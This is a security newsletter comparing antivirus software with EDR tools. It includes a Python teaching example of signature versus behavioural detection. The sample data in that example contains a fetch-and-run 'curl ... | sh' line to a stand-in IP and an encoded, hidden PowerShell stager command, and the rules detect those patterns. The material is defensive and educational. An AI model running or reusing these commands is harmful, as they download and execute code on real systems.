“There is nothing permanent except change,” wrote the Greek philosopher Heraclitus. This familiar idea, that we live in a constantly evolving universe, is particularly relevant at a time when our environments, and the cybersecurity ecosystem above all, are undergoing profound and ceaseless transformation. The growth in cyberthreats, and the increasingly routine use of generative AI and deepfakes to gain a foothold inside organizations, are putting corporate security teams under significant pressure.
The Changing Landscape of Computing
In the ever-evolving realm of cybersecurity, the need for robust controls is more persistent than ever. Endpoint protection is a prime example. For years, endpoint protection has been a fundamental control safeguarding desktops, laptops, and servers sitting behind company firewalls on internal networks, or behind a VPN for remote workers.
Nevertheless, in the last ten years we have witnessed two major shifts in computing: cloud computing and remote working.
Nowadays, a lot of small companies operate without a corporate office or computer network, instead leveraging cloud-hosted solutions offered by Microsoft and Google, and utilizing a mix of company-owned and personal devices.
With the blurring of computer network ownership and responsibility lines, coupled with multiple layers of vendors and widespread administrative access on endpoints, the importance of endpoint security has never been greater.
As cyberthreats evolve, traditional antivirus software is no longer adequate for protecting modern devices. This has led to the development of Endpoint Detection and Response (EDR) solutions. This month’s newsletter explores the shift from antivirus software to EDR, how each works, their dependence on the operating system, and the needs they fulfil in various environments.
This transition marks a significant shift in our approach to protecting digital assets, reflecting the changing nature of cyberthreats and the evolving requirements of new workplace environments.
What Is an Antivirus Software?
Antivirus software is the traditional endpoint security solution: a program designed to prevent, scan for, detect, and remove viruses and other malicious software on a computer. It compares files against a database of known malware signatures and quarantines or deletes matching files. While effective against known, commodity malware, this approach struggles against more sophisticated threats such as zero-day attacks. A zero-day (0-day) is a vulnerability in a computer system that is unknown to its owners, its developers, or anyone else capable of mitigating it. Until the vulnerability is remedied, threat actors can exploit it in a zero-day attack, and a signature written for one sample will not match a modified copy of the same malware.
Some antivirus solutions include firewall capabilities, which monitor and control incoming and outgoing network traffic based on predetermined rules. While essential for defending against network-based attacks, firewalls cannot reliably stop more complex threats such as fileless malware or advanced persistent threats, which operate inside traffic the firewall already allows.
From Antivirus to EDR Solutions: Behavioural Analysis and Machine Learning
EDR solutions go beyond traditional antivirus software by focusing on behavioural analysis and machine learning. Rather than relying solely on virus signatures, EDR solutions analyze the behaviour of processes and applications running on a device or computer network. By monitoring behaviours such as system calls, registry changes, and network connections, EDR solutions can identify suspicious activities that may indicate malicious intent. This approach is particularly effective against zero-day attacks, which exploit previously unknown vulnerabilities.
EDR also leverages machine learning to analyze the large volumes of telemetry generated by devices and networks and to detect anomalies and potential threats. By continuously analyzing and learning from this data, EDR software can adapt to new threat patterns and provide real-time protection against emerging malware strains, at the cost of false positives that analysts must triage.
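As an added illustration that is not part of the original newsletter, the following Python sketch contrasts the two approaches described above: a hash signature catches only the exact known sample, while behavioural rules over process telemetry (parent and child image, command line, registry and network activity) and a simple rarity baseline flag the same activity regardless of file contents. The “malware” bytes, the event records and the rule set are constructed assumptions for the example, not any vendor’s detection logic.

```python
"""Added example: signature matching versus behavioural detection.

All file contents, events and rules below are constructed for illustration
(hypothetical), not taken from the newsletter or from any EDR product.
"""
import hashlib
from collections import Counter

# --- Signature-based check (antivirus style) -------------------------------
# A constructed "known malware" sample and a signature database built from its
# SHA-256 hash.
KNOWN_BAD = b"#!/bin/sh\ncurl http://198.51.100.7/p | sh\n"
# The same sample with one byte of the URL changed: a trivial variant.
VARIANT = KNOWN_BAD.replace(b"198.51.100.7", b"198.51.100.8")
SIGNATURES = {hashlib.sha256(KNOWN_BAD).hexdigest()}


def signature_hit(file_bytes: bytes) -> bool:
    """Exact-hash match: catches the known sample, misses any modified copy."""
    return hashlib.sha256(file_bytes).hexdigest() in SIGNATURES


# --- Behavioural rules (EDR style) -----------------------------------------
# Each event is one process record: parent image, image, command line and the
# set of behaviours observed while the process ran (constructed sample data).
OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "wscript.exe"}

BASELINE = [  # constructed "normal" activity used to learn parent/child pairs
    {"parent": "explorer.exe", "image": "winword.exe",
     "cmdline": "winword.exe report.docx", "behaviours": set()},
    {"parent": "explorer.exe", "image": "outlook.exe",
     "cmdline": "outlook.exe", "behaviours": {"network:outbound"}},
    {"parent": "services.exe", "image": "svchost.exe",
     "cmdline": "svchost.exe -k netsvcs", "behaviours": {"network:outbound"}},
    {"parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": "powershell.exe -File backup.ps1", "behaviours": {"file:write"}},
]

MALICIOUS_EVENT = {  # constructed: macro in a document launching a stager
    "parent": "winword.exe", "image": "powershell.exe",
    "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4A",
    "behaviours": {"registry_write:run_key", "network:outbound"},
}

BENIGN_EVENT = {  # constructed: an administrator running a script
    "parent": "explorer.exe", "image": "powershell.exe",
    "cmdline": "powershell.exe -File backup.ps1", "behaviours": {"file:write"},
}


def behavioural_findings(event: dict) -> list:
    """Return the names of the (hypothetical) rules the event triggers."""
    findings = []
    parent, image = event["parent"].lower(), event["image"].lower()
    cmd = event["cmdline"].lower()
    acts = event["behaviours"]
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        findings.append("office application spawned a script host")
    if image == "powershell.exe" and "-enc" in cmd:  # also matches -encodedcommand
        findings.append("encoded PowerShell command line")
    if "registry_write:run_key" in acts and "network:outbound" in acts:
        findings.append("Run-key persistence followed by outbound connection")
    return findings


def rare_parent_child(baseline: list, event: dict) -> bool:
    """Toy anomaly score: flag a parent/child pair never seen in the baseline."""
    seen = Counter((e["parent"].lower(), e["image"].lower()) for e in baseline)
    return seen[(event["parent"].lower(), event["image"].lower())] == 0


def analyse(event: dict, baseline: list = BASELINE) -> dict:
    """Combine rule hits and the anomaly signal into one verdict."""
    rules = behavioural_findings(event)
    rare = rare_parent_child(baseline, event)
    return {"rules": rules, "rare_pair": rare, "suspicious": bool(rules) or rare}


if __name__ == "__main__":
    print("known sample flagged by signature:", signature_hit(KNOWN_BAD))
    print("variant flagged by signature:     ", signature_hit(VARIANT))
    print("malicious event:", analyse(MALICIOUS_EVENT))
    print("benign event:   ", analyse(BENIGN_EVENT))
```

The signature check fails as soon as one byte of the sample changes, whereas the behavioural rules never look at the file at all; they fire on what the process does. The rarity baseline is deliberately crude: on its own it would also flag any legitimate but unusual parent/child pair, which is why real EDR products combine such signals with rule context and analyst triage rather than alerting on anomalies alone.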
This approach is particularly useful in detecting Advanced Persistent Threats (APTs). An Advanced Persistent Threat is a stealthy threat actor, typically a state or state-sponsored group, that gains unauthorized access to a computer network and remains undetected for an extended period; the tooling such groups use is built to evade traditional, signature-based antivirus software. In recent times, the term may also refer to non-state groups conducting large-scale targeted intrusions for specific political or economic goals.
EDR solutions are designed to protect endpoints but they cannot provide complete security coverage for all the digital assets within your organization. EDR should operate as one aspect of your overall information security strategy, alongside other tools such as antivirus, patch management, firewalls, encryption, and DNS protection. By combining EDR with other cybersecurity measures, you can create a layered defence that can detect and respond to a wide range of cyberthreats.
What is Endpoint Detection and Response (EDR)?
Endpoint Detection and Response (EDR) is not designed to take an inventory of the desktops, laptops and smartphones on your network, but rather to proactively detect cyberthreats on those endpoints as they occur and to respond to them in real time.
The evolution of cybersecurity and EDR has been driven by the increasing sophistication and prevalence of cyberthreats. As the Internet and computer networks have become an integral part of our daily life, the risk of cyber-attacks has also grown. Cybersecurity measures and technologies have had to evolve in order to keep up with these cyberthreats and protect individuals, businesses, organizations and governments from harm.
EDR uses a combination of machine learning, artificial intelligence, and continuous monitoring of endpoint activity, including the network connections endpoints make, to identify potential cyberthreats in real time. If a cyberthreat is detected, EDR can take a variety of actions, including blocking the malicious process, isolating (quarantining) the device from the network, or alerting cybersecurity personnel.
As computer technology continues to advance, so too will the technologies used to protect against cyberthreats and cyber-attacks. It is therefore paramount that individuals, businesses, organizations and governments stay up to date on the latest cybersecurity technologies and best practices in order to stay safe and secure in the digital age.
Dependency on Operating Systems
EDR is available for various operating systems, including Windows, macOS, iOS, Android, and Linux. While traditional antivirus software is more prevalent in the Windows environment due to its market share, EDR solutions are becoming increasingly popular across all major operating systems.
In the macOS environment, for example, Apple’s built-in XProtect system provides basic malware protection against known threats. However, to address the growing threat landscape facing macOS devices, many organizations are turning to specialized EDR solutions designed specifically for macOS. These solutions offer advanced features such as real-time behavioural analysis and machine learning-based malware detection.
Similarly, in the mobile environment, iOS and Android ship with built-in protections (application sandboxing, code signing, and on Android the Google Play Protect scanner), but these do not provide comprehensive protection against sophisticated threats. Organizations operating in these environments need specialized mobile EDR or mobile threat defence solutions that offer advanced features such as network traffic monitoring, device encryption enforcement, and Data Loss Prevention (DLP).
On Windows, Microsoft Defender Antivirus ships with the operating system, and its EDR counterpart, Microsoft Defender for Endpoint (formerly Microsoft Defender Advanced Threat Protection, ATP), is a popular choice. It provides advanced protection against malware, including behavioural analysis, machine learning-based threat detection, and real-time response capabilities. Defender for Endpoint also integrates with other Microsoft products such as Microsoft Sentinel (formerly Azure Sentinel) to provide a comprehensive security posture across an organization’s entire ecosystem.
Finally, while Linux is often perceived as more secure than other operating systems, in part because its source code is open to review, it is not immune to cyberthreats. To address this, vendors such as ESET offer specialized Linux endpoint agents that provide advanced protection capabilities such as real-time malware detection and behavioural analysis in a lightweight package optimized for Linux environments.
Conclusion
To sum up, while traditional antivirus software remains useful for detecting known, commodity malware, it falls short against advanced cyberthreats.
As cybersecurity challenges grow, adopting comprehensive solutions like EDR is crucial for protecting modern digital ecosystems. In practice an antivirus engine and an EDR agent are often deployed together, the former blocking what is already known and the latter catching what is not.
Understanding the functionalities and system dependencies of antivirus and EDR solutions allows organizations to make well-informed cybersecurity choices.
References for Evaluating Antivirus and EDR Solutions
- PCMag: Annual Benchmark: The Best Antivirus Software for 2024 provides insights into antivirus software performance, assessing factors like detection rates and user interface. (link)
- PCMag: The Best Hosted Endpoint Protection and Security Software for 2023 (link)
- PCMag: The Best Free Antivirus Software for 2024 (link)
- Gartner Peer Insights: Reviews user experiences with various EDR solutions, helping organizations decide on the best fit for their needs (link)
- TechRepublic: EDR Software: Choosing the Best Solutions for Your Business (link)
- Canadian Centre for Cybersecurity: End User Device Security for Bring-Your-Own-Device (BYOD) Deployment Models – ITSM.70.003 (link)
- Centre for Cybersecurity Belgium: Recommendations for antivirus, EDR and XDR security solutions (link)
Contributions
Special thanks to the National Research Council of Canada for their financial support
Author: Peter Skaronis
Executive Editor: Alan Bernardi
Reviser, Proofreader & Translator: Ravi Jay Gunnoo